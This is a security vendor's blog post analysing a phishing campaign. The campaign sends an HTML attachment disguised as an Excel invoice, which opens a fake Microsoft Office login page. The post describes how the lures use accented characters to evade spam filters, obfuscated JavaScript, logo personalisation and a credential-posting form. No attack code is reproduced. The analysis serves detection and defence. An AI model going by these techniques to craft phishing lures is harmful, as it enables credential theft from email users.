Phishing campaign masquerading Excel template in the html attachment

Phishing remains one of the most popular types of corporate attacks in terms of its prevalence, and therefore it is not surprising that attackers are coming up with increasingly sophisticated methods to obtain the victim's personal data.

One of the most recent phishing attacks detected by Cyren Inbox Security was trying to gain the personal passwords of the emails' recipients through the attached html page that appeared to be an Excel file titled 'Microsoft Office Center'.

The Attack

Employees of several organizations using Cyren Inbox Security solution started to receive emails sent from the automatically generated email addresses all hosted on the compromised sender domain.

The sender's display name mirrored the targeted organization <[Company] Invoicé Repoŕt> and the subject prompted 'Invoiće ID:XXXXXX is ready for paymeńt'. Phishers cleverly used the special characters in the subject and display name (é, ń) in order to minimize the chances of the automatic email spam filtering by the 'Invoice' and 'payment' keywords.

Email body was empty, but the email contained an html attachment passing for the xlsx file of an invoice mentioning the specific targeted company in its name, increasing the chances of the recipient to open the file. Once opened, the fake login page titled 'Microsoft Office Center' on the Excel background appeared aiming to steal the user's password.

Visually, this attack looks identical to the one mentioned in the recent article by Bleeping Computers, where Morse code is used in the html attachment code to hide a phishing URL. But in this case, instead of the Morse code in the html attachment, the obfuscated Javascript code is used that makes it harder to unveil its true purpose until it is executed.

The script contained the separate function personalizing the visuals of the phishing campaign:

The ml variable was responsible for the recipient's email address, and the var logi added the targeted brand logo image onto the phishing page. The images were taken from the logo.clearbit.com - a legitimate Logo API tool from Clearbit in which hundreds of company logos are freely available. This script not only makes the attack personalized, but also significantly expands the potential number of affected companies by the attacker changing the logo variable only.

The password field on the html attachment is responsible for stealing personal information. This is executed in a PHP form with method post and action URL that would send all the inserted credentials and password information to the attacker:

The action URL is exploiting the legitimate Japanese site for its hostile purposes: enctype='multipart/form-data' which indicates that all the submitted login and password information would have been divided into multiple parts and sent to the phishing server.

Cyren Inbox Security Detection

With Cyren Incident Response Service and its 24x7 support for phishing investigation, the attack was rapidly investigated and all the emails related to the attack were appropriately classified as phishing for all the targeted Cyren Inbox Security customers.

Public link

Please use the above public link if you want to share this noodl on another website.